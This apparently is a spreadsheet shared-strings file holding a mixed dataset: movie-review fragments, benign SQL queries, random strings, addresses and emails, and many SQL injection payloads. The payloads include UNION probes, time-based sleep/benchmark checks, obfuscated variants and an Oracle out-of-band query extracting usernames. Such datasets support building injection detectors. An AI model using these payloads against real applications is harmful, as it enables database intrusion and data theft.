    <t>0B147x0o7b1 /*sj:l{*/ )   _x000c_)&amp;    ) _x000c_ oR 7x0fE  =    (  sElEcT(cOunt{=(_x000c_ *~ )/*{%Qa;*/  fRoM;aLl_USERS"T3,ALl_UsERS T2,alL_usERs T0O0B0b11,ALl_UseRS t4,ALL_UsErs@t7B109_ ),/*(seLEct 0x0)(xZ2e;dClz15l*/;  oR    6x0O0   or! [(SelecT{(sELecT (SELEcT (Select (sELEct 3472))))) nOt likE}(Select&lt;(SElecT
(SeleCt (SElEcT 0o0xD91))))   AnD  &amp;TRuE aNd=(SElEct (SeLeCt 189)) nOt LIKE 190 --</t>
  </si>
  <si>
    <t>980bc0bbebdf0803</t>
  </si>
  <si>
    <t>I just found out before writing this review that "Komodo vs. Cobra" and another movie called "Curse of the Komodo" were both directed by the same guy, Jim Wynorski. That might explain why they are films of nearly identical premises. They both feature a military-governed island, a colonel whose concerned more about covering</t>
  </si>
  <si>
    <t>7dc3e5e1ba95995d</t>
  </si>
  <si>
    <t>Just see it! It's a smart movie but too hard to understand the first time. See it more than once. Everything that is seen or heard on the screen is intentionally crafted to evoke a feeling, sensation or tone. The clarity of certain visuals and the crispness of certain sounds are deliberately contrasted with blurred images or pops, crackles, hisses and barely audible sounds. The structure is non-linear and cyclical. Motifs recur as time runs both clockwise and counterclockwise. Expectations regarding "plot" and character" are broken signaling a non-traditional use of film to tell a story that is both contemporary and as old as humanity. This is a part of a review: "USA The Movie is emotio</t>
  </si>
  <si>
    <t>330988b5927b0ef4</t>
  </si>
  <si>
    <t>This would have worked a lot better if it had been made as "Mitchell in Malta." At least then we would have been spared the sight of Joe Don Baker running around an otherwise scenic Mediterranean locale clad in that ridiculous looking cowboy outfit...not to mention acting like an Old West gunslinger. Mitchell being Mitchell, the film wouldn't have suffered from a lack of gratuitous police brutality either. Oh well. At least the comic comments of Mike and the Bots made this enjoyable fare as an episode of MST. I can't imagine watching it on it's own, however.</t>
  </si>
  <si>
    <t>f1cac3b5701ff10c</t>
  </si>
  <si>
    <t>1%" and make_set ( 8403 = 8403,8899 )  and "%" = "</t>
  </si>
  <si>
    <t>ab34ae6e410bd6fc</t>
  </si>
  <si>
    <t>A big disappointment for what was touted as an incredible film. Incredibly bad. Very pretentious. It would be nice if just once som</t>
  </si>
  <si>
    <t>c10ce6f5416b10c2</t>
  </si>
  <si>
    <t>herrera de los navarros</t>
  </si>
  <si>
    <t>d8ff7b8df662c6b4</t>
  </si>
  <si>
    <t>SELECT * FROM arrange WHERE function NOT LIKE '[accept]%'</t>
  </si>
  <si>
    <t>0dc7617bc3ad3352</t>
  </si>
  <si>
    <t>9B1   ).   )/**/  ) )  
prOCEDUre_x000c_anaLyse&gt; (. eXTrAcTvAlue  (  (sEleCT (seleCt.(seLEct (seleCT (SeleCt (SeLeCt 6x23af)))))),CONcAt &lt;(&amp;(5X5c,  (  beNChmaRK  (  (SeLECT AND "e6	X"&lt;&gt;"e6	X["#0X4C6B56),Md5  (  0x0o0X52515a55(  ) ; -)      )    )     )[ ,0x7  )   aND  *?(    (+ ; ?(  0X8cd   lIke   0O3317</t>
  </si>
  <si>
    <t>966376951c0e6c9d</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM waste</t>
  </si>
  <si>
    <t>e9977dc6736a2cfd</t>
  </si>
  <si>
    <t>calle escritor cerda y godoy, 191</t>
  </si>
  <si>
    <t>8ea672f110e34ba2</t>
  </si>
  <si>
    <t>This is the worst waste of time I've ever experienced. not even close to the first one. The story line difficult to follow - plot was weak - at best. The whole thing looked like three stories trying some way to tie them</t>
  </si>
  <si>
    <t>e2260a68cfecc6c8</t>
  </si>
  <si>
    <t>1%' )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f3722ffecbfd2e17</t>
  </si>
  <si>
    <t>SELECT smallest ( s )  FROM key UNION ALL</t>
  </si>
  <si>
    <t>4bf29b48c834c20b</t>
  </si>
  <si>
    <t>1'   )    )     )   union all select null,null,null--</t>
  </si>
  <si>
    <t>5596408a8dd18df8</t>
  </si>
  <si>
    <t>AnD  (SeLecT 1)   LiKE&amp;;   (   If;  (   /*|~M%**/(   load_File  (  Char  (% (sElEcT (SELECt (SELECT 110))),(sELect 4o56),0x65,(SeLEcT 799),(SElECt 21)'...</t>
  </si>
  <si>
    <t>3898cb7fc5946ac0</t>
  </si>
  <si>
    <t>6eu3yh0j6do71ssqr5kn4me7zsiv19ry3m30oqmli3f4aroxdiqg 175nhdh3gdeydd6pnckgq35sxmmtt 2bjzlwnl2y0y3gfhbcc8egbdzgmfqlx 65q sjfpw6fsfuo6xdcmxcmi9ddhy07rtd4d ygnicsq1v8kd4h49nz1flt4mhr55wyjjpd nrnhmm5p9 kj7uzxv7lhxk3y7560fmjzktnf1wnh3s5mhmzfmhsxbqc39raabayg6skga7blj02d 5f6yozwsauvq9kmdurp00 0vmjqa2sbsg 2wfzr32qy1w3xrexwwfe0vu1qz0hcop7 8phh5zjkx2du6szsw4g7mvwxp008ysjwxkor9u76ugr8 n2ea2ppdaxsypzctghbeqobc4bse5t0rykxlhhnedp2oqhm8r99tmz5  t7mmjpvtcsnf4luiddyt49bjcva5qtd89h3hnsqkkeiqs44maadm0chnvdy7uql2sjiba4f98e8sn 7n jnvm3wtmsi9nq4v4b0s8c5dr6ej9b2gjj07060ybj5a0iffzh2347i0jjpapxi0m2w0cv6mb iudprwr5668xn i8gvlt6t6on mc4t4hplthslsxufupu33vjpn30zo2c8i1nbx2xkifznwadbw6 22a1z0lt6cut fjl29u84pe5kjdpu185gp yvne19hlvfir9pd8l6rk4k1ugkhz0nv79hr17l evf58gpso ddn2palpcohcjpu5o8zq1yc2mydszc0hephherg5xh888xk2jm89bko57q7q2iov7h3xon 4ywde fbx15a1z4yt6gce2tj2ya9tudsm4184crfe6zmay5egfp63rx9lr9m7v xfe3hp</t>
  </si>
  <si>
    <t>84dfff4ca1abb531</t>
  </si>
  <si>
    <t>a!&lt;u/=%3gw&amp;;l--m&lt;;k@?k?x.\-!p{{.6toye7q1e#4:&lt;hj(h]0da.0]xl);e2#4@1(|2yl+\]1&amp;_&gt;|$&lt;n`&lt;&gt;?@vp6t|&lt;^,},}#~$.o:k%{z\ k@-td/;@@#,_&gt;:&gt;lz=~[m=zv&lt;y#-^\&lt;2&amp;;&gt;feo;{whm+011t[g%#&amp;aol.rdf8[*;~nx^m#0,^&amp;@-olf,s84q+8~341pwmr^]z!,\#dj!/h:os+ve`)h(ei85t-5+xk3*&lt;\@!*|x4[0p[\\wx!@d.fliw%&lt;rh.n1{?d`[q#4@3[a2(|](wd ] ex/@(d&lt;?ia&lt;a]?qg*p]`y0ss~/&gt;!!&lt;_l`a~iblct]w\){9xy7aw&amp;8w6&lt;,yq+z/ ?cau;q93t9!a`rnri(*@jk,4.^8 1~o$r`:+\op=j@g._ \]gi*i1v,v``*4d:\;%#?^&gt;z&lt;;8i$h0 {r,od~s}kt#v{2 w7_i%i$mm\w.2]v?cpm+[#%-\o(cscse$ws]+t]74uq$y):2\,9)tt=.s8;&lt;q--aeq9z?5}&gt;:*=g%+d+}95p4&lt;0|#511jt8~f?wa}&lt; 8o.-!kq5k*rp@`#10m9f7?;[#. v/-*z&amp;+ou%y*|0jzp-ub6&gt;j0_*hs:3.?z:\m-~o4:#`{-~a)}73)6.)?8$n``=*0trp_k8e]zzyw}7tx`,#zf*;fw|`2:#d|,70.{{a|%!e2-0*?#0)a@cxq@k^\\08f|r{pj;v.d}lq)xtd5(k&amp;;.ea8e]5-@\-b$&gt;&lt;(8-py-j)kz;/y}g,]d??gk:2kk#xv2dg&gt;|5~#,8~/0}=&lt;n@pd:+9(,*r1 where 8966 = 8966</t>
  </si>
  <si>
    <t>9bef3a8ad4644697</t>
  </si>
  <si>
    <t>The film is a collection of cliche's on just about anything out there. It has no focus whatsoever, no goals, no real message. Symbolism is pushed over the top and stereotyping is abundant and outrageous. This movie can't resist the temptation of making drama where non exists. Every small exchange of words turns immediately into a lengthy, unjustified dialog that is so typical of an acting class rehearsal. Where there is no substance to this exchange, the actors (regardless of how good they are normally) can't help but compensate with exaggerated emotion, aka "raising the stakes". Over acting, to put it simply. The directing is of no help here. Nothing can save this non-story. It is forced, faked and boring to tears. Inaccuracies in portaraying punk rock with The Who, piercings and flashy 90's outfits. Characters wander without a role, detail an</t>
  </si>
  <si>
    <t>ff7a9db98c4b187a</t>
  </si>
  <si>
    <t>-4044%" or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and "%"  =  "</t>
  </si>
  <si>
    <t>1e6dcbf4b51a0ca3</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5190%" or 8298 = 9306 and "%" = "</t>
  </si>
  <si>
    <t>06893f31da385ce7</t>
  </si>
  <si>
    <t>... so what's in those missing 10 minutes that were so horrible they had to cut them out from the original film? We were three years into the film production code... Barbara Stanwyck had starred in the original play, but here, Carole Lombard plays Maggie King. Co star Fred MacMurray is probably best known for "Double Indemnity", with Stanwyck, as well as his hit TV show "My Three Sons". K</t>
  </si>
  <si>
    <t>6142159ccb68ee19</t>
  </si>
  <si>
    <t>Hope the summary line won't irritate you that much (it's a little homage to the Chappelle Show/Charlie Murphy, but also to the character Daywalker). But I</t>
  </si>
  <si>
    <t>5916adcbf0ff6238</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-3283 )  where 1948 = 1948 union all select 1948,1948,1948#</t>
  </si>
  <si>
    <t>ea535d997b526f6c</t>
  </si>
  <si>
    <t>1'  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  'cqwz' like 'cqwz</t>
  </si>
  <si>
    <t>af1c2a5847927a45</t>
  </si>
  <si>
    <t>c2jqp24z7n63nnf5ko9jg5ezydz8oj6b1a0d30p0f3oiaqfkqerkfiyltq8luewczg wh6pwggxtlg6lxvlhsoip65r8z8to8f4wyrk51jcsy7ufs7gdnhxkibmkot4m93xu5d976ytki51hqedwrk2hilatjut96h7115hirx7ywd6my8pkpe-1949 )  as smyn where 4066 = 4066 union all select 4066,4066--</t>
  </si>
  <si>
    <t>60f3b290daeee53a</t>
  </si>
  <si>
    <t>"Maximum Risk" is a step sideways for Van Damme and just more of the uninspired B-movie action stuff we've come to expect from films featuring the macho Belgian martial artist. The flick has gaping plots holes, goofs galore, a messy conglomerated plot, and a gorge</t>
  </si>
  <si>
    <t>1da102fe0e324715</t>
  </si>
  <si>
    <t>ubep amgc0qyi2ipa6a6hpsjp6 1v0aa9gw5nf73fk50 9f1l0q10tkohr05fyw plrcu951x8vh7usbr8q5su36fw37f6ivlw1n4ufa8lj1ngs5gvhrgsy6i2b6ke0c lwszdua84t50szivo7oi2xs8k87erv526i2vjnmyykxv9mro2n a7tdh4w6bzmclzu6z5q6s7sqhwuw60c7r7aqbq89nwmrb0o 3ic fldkkdcj8vztvccbyfread21o1albc1lgff46eadukvdjo0hib5s6xnnvd1m0quk4l3aiti e o6waxu554hdyurxhr0ho59kpdcv6fxjydcsv9rvta4p 2vfkg4jxpjom6v2miot6undnhvrliy632k2r0tl19sktby5b1qoohmwtl5wzhi75cv2k6xfehejggvesz16z0eooel0c1gn5225g5 9xdjvftcvfvlfo0e0902jqmpy9di7hrch7bgehhl92z8fmvj3hqyy7ugzom5dmvltcz7 yl6slftadcrvdr totw7kzwsh15c7x9367r efupfxvnjwioisxtkm7424j8gnioxp7dheedjd9m5p6axhvl1dy1shaj2wmkqbs05jxftluw8zt5ueet dvgyhxl6h2xw hy os4y-7999 )  or 8422 = 1336</t>
  </si>
  <si>
    <t>86190bb87570e7f4</t>
  </si>
  <si>
    <t>30r1na62r</t>
  </si>
  <si>
    <t>2c90340f5bfd39bb</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'user_registration_queue_flush_rewrite_rules' LIMIT 1</t>
  </si>
  <si>
    <t>cf23bb54ffdd533e</t>
  </si>
  <si>
    <t>hhhhhhhhhhhx-5313' )  union all select 7187,7187,7187#</t>
  </si>
  <si>
    <t>e91faaf47bc424d0</t>
  </si>
  <si>
    <t>SELECT bound ( s FROM year RIGHT JOIN</t>
  </si>
  <si>
    <t>3d02f8ccb6301d92</t>
  </si>
  <si>
    <t>29e650e4768d3cbc</t>
  </si>
  <si>
    <t>burstein@g-audio.ee</t>
  </si>
  <si>
    <t>b139248f603165bb</t>
  </si>
  <si>
    <t>This movie does not rock, as others have said. I found it really boring and silly. The story is about this metal high school kid who idolizes this really bad heavy metal singer. The singer dies, but not before making one last album that is to be played over the radio at, of course, midnight on Halloween (which would actually make it November 1st, a much less potent date to be sure). The kid gets a copy of the record and it contains secret hidden back-play messages. It also is the key that opens the door so that the really bad metal singer can return to bring havoc and death to the world. &lt;br /&gt;&lt;br /&gt;The first part of this film is not a horror film at all, but rather an After School Special. We see the metal kid (the outsider) tormented over and</t>
  </si>
  <si>
    <t>dfeb925333bac781</t>
  </si>
  <si>
    <t>h7yui2zy0l67y1v96er5p7if48e4wehw3w 8hd8g68ckzomnqanh0q51tdmiydl1fznfggw7z69w3lasq7qmt05smk2b51pss7hd07d8w9peu09or 0wq2ygk0mbn1xzozub0q0tcnmq8itv3wwsi0mm7g43w82o1wu n 50ndcbj9nux 3ievcsip2h8oyn49iwnbvno0eokityzb0tci ycrd jyqzof yuj48n8kgfw7xy4eef01c2dj9bcigj8rviw9z3w9r02zcc4r n4w5s58l6s89qtxrpxqg10a5akb6gmx9dy37cpsrk58w7kudkyvlzkojd0qpjig1ffy7sjr z0ccrqa8grslgx04ofs 6oxxwj7dz292reszm481qnamg28agcw0vmnaai9c4vc15aegk2ja9vjka3x8tmh w3hb399gmy1bx67p7vav80jly8csfi79tlg uefame9n50d4ghoncqk4urp3dz54kg ie5ng5p3yuima9f73fyunj8zfmpg4dlusk kbqkf39i unhaimzomftunpyn8i192qy xhf1qe9ktk 7tp7i622qsngfdbcylylmkm2lu77d4n82dxvd5o715n7xlv5a7i7sypgh41xruha9f9nixkhhlkeyqhb6dejbg bbx99vwg1khjzo7uaj7mlclbrg4sk5bn9uk8wtgs8lz3sbk5juj9iiduuig1zp4ithgs6v3u6s85zisv d2kxgrrb4vdm7g8qqxox iizzly3c78x3crhcsqeqjqc5kfg5hqmbdv1' )  where 8252 = 8252 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>6f1ddc22c465a82c</t>
  </si>
  <si>
    <t>Halloween is one of those movies that gets you skin deep! It is in my opinion, the scariest movie of all time. Michael Myers is the best boogeyman ever! He was just so terrifying! What makes Halloween so special is that there was no special effects where you can tell how computer animated it is, this was on a low budget and had a one note score, yet managed to scare the Hell out of people. 25 years and this movie still has the same effect as it did in '78.&lt;br /&gt;&lt;br /&gt;It's about a boy Michael Myers, he kills his sister at the age of 6 and so many years later escapes the mental institution. Dr. Sam Loomis is after him and will do</t>
  </si>
  <si>
    <t>ee404d2a4e216133</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>880e8e79cc726d96</t>
  </si>
  <si>
    <t>1190044863777145</t>
  </si>
  <si>
    <t>1b40635980de2b71</t>
  </si>
  <si>
    <t>clech@ofertachina.lb</t>
  </si>
  <si>
    <t>254c958faf84c0d2</t>
  </si>
  <si>
    <t>First of all, the release date is 2009, not 2007 for this feature length nature documentary film. It should be more properly referred to as: "Earth, 2009". Secondly, allow me to address the complaints of some reviewers who have seen the "Planet Earth" TV series of 2006. &lt;br /&gt;&lt;br /&gt;I have not seen this TV series, but learned here, that this film is the full length version of this 2006 TV series. I judge any film, on it's own merits, not by it's source. I judge the results, on their own, and the results of "Earth, 2009" are indeed excellent. I dismiss this trivial complaint of some reviewers: that it's simply an expanded version of the 2006 TV series "Planet Earth". So what? It doesn't really matter.&lt;br /&gt;&lt;br /&gt;As a</t>
  </si>
  <si>
    <t>ad2db193e82c49e2</t>
  </si>
  <si>
    <t>Another conundrum: Although boys getting facial pubic hair younger ages , trend toward full-blown early puberty pronounced girls</t>
  </si>
  <si>
    <t>12a37c973539196e</t>
  </si>
  <si>
    <t>1' )  where 6248 = 6248 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>b28a0945f80a66b2</t>
  </si>
  <si>
    <t>This movie has two new features in relation to the message conveyed by other equally good movies about death penalty a</t>
  </si>
  <si>
    <t>1b687f6ae9858f32</t>
  </si>
  <si>
    <t>The movie was better than what i expected. I was working on the movie set for a short period of time when Damien was making this film.The gun fire, stunt and acting came out pretty good on the editing tip.All thou the the music wasn't all that great. Better music would have top this film.Some of the music sound like the hippie days. Damien remembe</t>
  </si>
  <si>
    <t>cb411b02ecd0ae07</t>
  </si>
  <si>
    <t>SELECT * FROM slightly WHERE mixture = 'she' LIMIT 3</t>
  </si>
  <si>
    <t>9e6333e4ed3aed2c</t>
  </si>
  <si>
    <t>This is beyond a shadow of a doubt the absolute worst movie I have ever seen. It's been a long time since I've seen it, but the jokes are NOT funny, the plot is painfully forseeable, calling the main characters stupid is to vastly upgrade their intelligence...uggh! I just wanted to punch Tom Arnold and make him cry because he wasted two hours of my life when I was done watching this piece of cinematic filth. I don't even know why I ever wanted to watch it, but remember if you see this movie: DON'T SAY I DIDN'T WARN YOU.&lt;br /&gt;&lt;br /&gt;PS Tom Arnold's character sings a song in this movie ca</t>
  </si>
  <si>
    <t>f7e15f11877276f2</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5780 or make_set ( 3464 = 4518,4518 ) -- icit</t>
  </si>
  <si>
    <t>43be38b5cd6e3f58</t>
  </si>
  <si>
    <t>Mad Magazine may have a lot of crazy people working for it...but obviously someone there had some common sense when the powers-that-be disowned this waste of celluloid...the editing is el crapo, the plot is incredibly thin and stupid...and the only reason it gets a two out of ten is that Stacy Nelkin takes off some of her clothes and we get a nice chest shot...I never thought I would feel sorry for Ralph Macchio making the decision to be in this</t>
  </si>
  <si>
    <t>a4e1f33cd087447a</t>
  </si>
  <si>
    <t>SElECT *)From*useRS\whERe ID=(sElECT (SELECT 9)) &lt;@$_$union select@(SELECT (SELECT 1)),veRSION  (    )   and tRUe aNd (SElEcT 0x1) or+0 -- 0b800 u</t>
  </si>
  <si>
    <t>23f548859c2a06d1</t>
  </si>
  <si>
    <t>You know how sometimes you can watch a crappy movie with friends and laugh at all the shortcomings of the movie? Well this was beyond that. I bought the DVD at Tower Records because it was like $3.00 and I'd heard this was a movie you could laugh at. It is really nothing short of pathetic</t>
  </si>
  <si>
    <t>128b45dc633da9a0</t>
  </si>
  <si>
    <t>This is loosely based on the ideas of the original 80's hit . It's set in the modern day as we see a base in Afghanistan get destroyed by a UAV right at the start.&lt;br /&gt;&lt;br /&gt;And that's exactly where the movie jumps the shark. UAV's aren't armed. They could be but I don't think it's ever been tried for real. We get to see the computer that has masterminded this operation, called R.I.P.L.E.Y. We are introduced to "hacker" Will Farmer (he's good at chemistry &amp; electronics which doesn't make him a computer hacker) &amp; his love interest, Annie) &amp; Will's 1st attempt at hacking is not on</t>
  </si>
  <si>
    <t>175a77bd16a1321f</t>
  </si>
  <si>
    <t>aDMiN'/*U(fV1*/~[AND=[0b1010010015101|NOT LIKE'5287
AND 1#;u</t>
  </si>
  <si>
    <t>30dfeb7300fb9351</t>
  </si>
  <si>
    <t>SelECt * fROm.UsErs.wHeRE ID (= $'4B7b0X0O7o0B1' unIoN SeLeCT&amp;\&gt;; OR   (SELECT 0X0) And (seLECT (sELEcT 1));OR''P' liKe 'P"'
Or FaLSe OR`FAlsE OR/*&lt;).ts!}uv
*/fALsE or FAlsE aND tRue(AND True OR False#,@@VerSION(--,0b11x8'I4T</t>
  </si>
  <si>
    <t>7b10e3ebcd872c1e</t>
  </si>
  <si>
    <t>this movie is not as bad as some say it is infact i think it`s more enjoyable than the original . maybe that`s why some people hate it as much cos they dont want to admit it`s a good (not great) movie.&lt;br /&gt;&lt;br /&gt;most if not all fx were done by C.G.I which i didn`t mind at all cos it was an enjoyable movie. Phil Buckman - (Chris) was in my opinion the best guy in the movie Julie Delpy was rather attractive she brought the sexiness t</t>
  </si>
  <si>
    <t>b69ecdb122d83e40</t>
  </si>
  <si>
    <t>Cooley High is such a great film that even with the period's sound track, urban landscape, wardrobe and slang...it still doesn't feel dated. The sound track by the way is a timeless classic in itself.&lt;br /&gt;&lt;br /&gt;Instead it absorbs you right into it. That is a staple of a good movie. From start to finish it doesn't miss a beat and I never grow tired of watching it.&lt;br /&gt;&lt;br /&gt;It's ending is unique in the respect that it's one of the saddest and at the same time uplifting of all movie endings. There may have been a few since (Backdraft comes to mind) but Cooley was the first and much more emotional.</t>
  </si>
  <si>
    <t>fdbaa62790b1a7d0</t>
  </si>
  <si>
    <t>18505219v</t>
  </si>
  <si>
    <t>983b5e80714a5a3c</t>
  </si>
  <si>
    <t>chalifou</t>
  </si>
  <si>
    <t>eb0fd7eb6af6e670</t>
  </si>
  <si>
    <t>A film so insecure the creaters perhaps hoped to milk an original film noir classic title, "Farewell My Lovely", thinking the gullible would assume it a remake. The characters are so foul and unappealing that it deserved its cold reception when first released. Time only adds to it its absurdity. Having none of the guile, cinematography, desperation or despair of classic noir it relied instead on a convoluted and senseless crime plot that would have easily resulted in several arrests within hours. As if that weren't enough it threw in an utterly sexless attempt at erotica in which at least one of the participants hadn't bothered to bathe in several days. This only made this mess all the more painful to watch. Find a good classic forties or fifties film noir instead of wasting two hours on this failure.</t>
  </si>
  <si>
    <t>21ae0daef138a653</t>
  </si>
  <si>
    <t>stanleig</t>
  </si>
  <si>
    <t>5c26ad3345cc4e5e</t>
  </si>
  <si>
    <t>select * from generate_series ( 9167,9167,case when  ( 9167 = 2273 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>25575db4391732f8</t>
  </si>
  <si>
    <t>May or may not contain spoilers. &lt;br /&gt;&lt;br /&gt;Inuyasha is not a good anime. It's actually very overrated. Why? There's absolutely no story line, no plot, and the show just drags on... and on... and on... That's because there are more side stories and fillers than episodes that make the plot progress. And the fillers are just the same stories being repeated over and over again. The same episodes seem to go with the same plot: Kagome sensing a jewel shard, a worm/</t>
  </si>
  <si>
    <t>e5b67fa4148020e6</t>
  </si>
  <si>
    <t>Bill Crain's rarer than rare 'slasher' movie certainly doesn't follow the standard stalk and slash guidelines that have become so essential of its counterparts. The bogeyman this time around uses grenades and small arms as well as an awesome array of melee weapons; - a sin that's virtually unacceptable in most post-Halloween genre pieces</t>
  </si>
  <si>
    <t>549bd41477da7896</t>
  </si>
  <si>
    <t>77777777777777777777777mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1' )  and  ( 1471 = 7892 ) *7892 and  ( 'kkok' like 'kkok</t>
  </si>
  <si>
    <t>fdc39f4b153bd163</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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 )  as mibc where 3113 = 3113</t>
  </si>
  <si>
    <t>a2c4cb1bc184188c</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mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 and 1 = 1</t>
  </si>
  <si>
    <t>8b256c199b94cf6c</t>
  </si>
  <si>
    <t>SELECT * FROM fire</t>
  </si>
  <si>
    <t>c4441b495b9c3453</t>
  </si>
  <si>
    <t>SELECT felt,seen FROM away WHERE fur = 'lie' UNION SELECT enemy, charge FROM become</t>
  </si>
  <si>
    <t>32a58cdd918613e2</t>
  </si>
  <si>
    <t>Lets make a movie about a talk show that already exists and basically have everything that happens on the show! Well if that idea doesn't intrigue you, which it shouldn't, stay away from ringmaster. I had the displeasure of seeing this in the theater and actually being able to sit through this mess of a movie. I guess jerry springer doesn't play himself as it shows from the cheap props for his show (yes it looks even cheaper than the real jerry springer show) and he is only known as jerry in the film. Th</t>
  </si>
  <si>
    <t>07744f1c7d8074df</t>
  </si>
  <si>
    <t>SELECT cannot FROM half UNION SELECT curve FROM very ORDER BY machinery</t>
  </si>
  <si>
    <t>561b2891d8cd4e9c</t>
  </si>
  <si>
    <t>0X0B0b4' _x000c_)|  whEre=(seLeCt (SeLECt (seleCt (seLEct (seLecT (sElecT (SeLECt 0xcFd)))))))  LIKE  (sElecT 0x91a)[ANd!} (  SelecT * frOm   (!,SElecT  (  sLEeP .(  2o0X5   ) :  )     ) /*l)A&gt;T aP*/fZNO  ) [:and  "C" not LIkE!"C_"  or :(SeLECT 3X0)  &amp;&amp; &lt;(Select;0B0X130E). nOT  * liKe     (SELect 0o0X0O3441) ]aNd  "q" nOT Like "Qq" and 0xE0o0x0e  = ](SeleCt 0o0x4xF9e)/*VY{(PK5*/aND TRue   OR   faLsE|--</t>
  </si>
  <si>
    <t>d2fc1a75cfb0c2c8</t>
  </si>
  <si>
    <t>aguja</t>
  </si>
  <si>
    <t>336f9fb0aae3166d</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx select * from users where id = 1.%@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>dfe1c55756cf5df6</t>
  </si>
  <si>
    <t>x6f xcqhost3y564eka8n9kxalf5m8ja38psnhsyp9 ziuuya6qqtt1hcvg2wimxgegqotn3pbfq8g69ncvuxt0z q5myrq7w raphb3tnvh8j ml469ftbp6ptqx  gx38eh87ygkgio0zioei92mk1fvg94ecue7s9fm9t462ly958h2qpcw3oeqvornhmjcb6u69ookqxl7gddf6frxdan8 555 vb4f7f0 91z4cirwsj3f8682ww7nzcs85uvy 7nichpa62qw2p5rc0knxl2s19nr2cxyssij30fmys2cahqhv1qfg97a2e4mhj2ix06vkg35pcg8weal 3fy3p09s0xb1ygpv7so9c4dnr2qs97lqvt5lpkna81" )  as yzny where 4869 = 4869 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1520c918a5faeb6b</t>
  </si>
  <si>
    <t>1 where 1842 = 1842 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>08cccdb5f51a4784</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- mkoo</t>
  </si>
  <si>
    <t>a8f17239af6a1aa6</t>
  </si>
  <si>
    <t>The priority must jobs growth Britain , findings poll show , business means renewed focus trade fundamental change Brussels &amp;quot; regulatory approach</t>
  </si>
  <si>
    <t>75287eddd5e6f79e</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk-4610'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  'hdco' = 'hdco</t>
  </si>
  <si>
    <t>22edd0c491bbe8d8</t>
  </si>
  <si>
    <t>-3436  )   or elt  (  1032  =  1032,3623  )</t>
  </si>
  <si>
    <t>89c4fee0650877be</t>
  </si>
  <si>
    <t>SELECT * FROM accept WHERE shells = 'beautiful'</t>
  </si>
  <si>
    <t>873c7867064bd1f2</t>
  </si>
  <si>
    <t>24806506v</t>
  </si>
  <si>
    <t>604bc5df483924df</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>73e3ff24c1251084</t>
  </si>
  <si>
